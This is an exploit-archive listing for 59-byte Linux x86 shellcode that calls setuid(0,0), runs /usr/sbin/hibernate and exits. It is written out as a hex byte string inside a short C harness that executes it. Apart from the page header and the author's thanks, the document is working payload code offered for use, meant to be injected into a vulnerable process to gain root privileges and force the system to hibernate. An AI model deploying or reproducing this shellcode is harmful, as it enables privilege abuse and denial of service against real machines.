linux/x86 setuid(0, 0) + execve("/usr/sbin/hibernate") + exit(0) - 59 bytes
| EKU-ID: 4762 | CVE: | OSVDB-ID: |
| Author: Febriyanto Nugroho | Published: 2015-04-20 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 4762 | CVE: | OSVDB-ID: |
| Author: Febriyanto Nugroho | Published: 2015-04-20 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
/* +========================================================================================================= | # Exploit Title : linux/x86 setuid(0, 0) + execve("/usr/sbin/hibernate") + exit(0) - 59 bytes | # Exploit Author : Febriyanto Nugroho | # Tested on : Linux Debian 5.0.5 | -------------------------------------------------------------------------------------------------------- | # Thank's to : xevil, CyberKaze, X-Cisadane, Deyubi-Cyber, Deflectoz, justinisal, Bomber88, | ame, d0ey_Grunch, bh0ttu, Revil, and all Bogor Hackers Community member and crew ... +========================================================================================================= */ #include <stdio.h> #include <string.h> char *source = "\x31\xc0\x31\xdb\x50\x53\x89" "\xe1\xb0\x17\xcd\x80\x31\xc0" "\x50\x68\x6e\x61\x74\x65\x68" "\x69\x62\x65\x72\x68\x6e\x2f" "\x2f\x68\x68\x2f\x73\x62\x69" "\x68\x2f\x75\x73\x72\x89\xe3" "\x50\x53\x89\xe1\xb0\x0b\xcd" "\x80\x31\xc0\x50\x89\xe3\xb0" "\x01\xcd\x80"; int main(int argc, char *argv[]) { printf("shellcode length -> %d bytes\n", (int)strlen(source)); int (*ret)()=(int(*)())source; ret(); return 0; }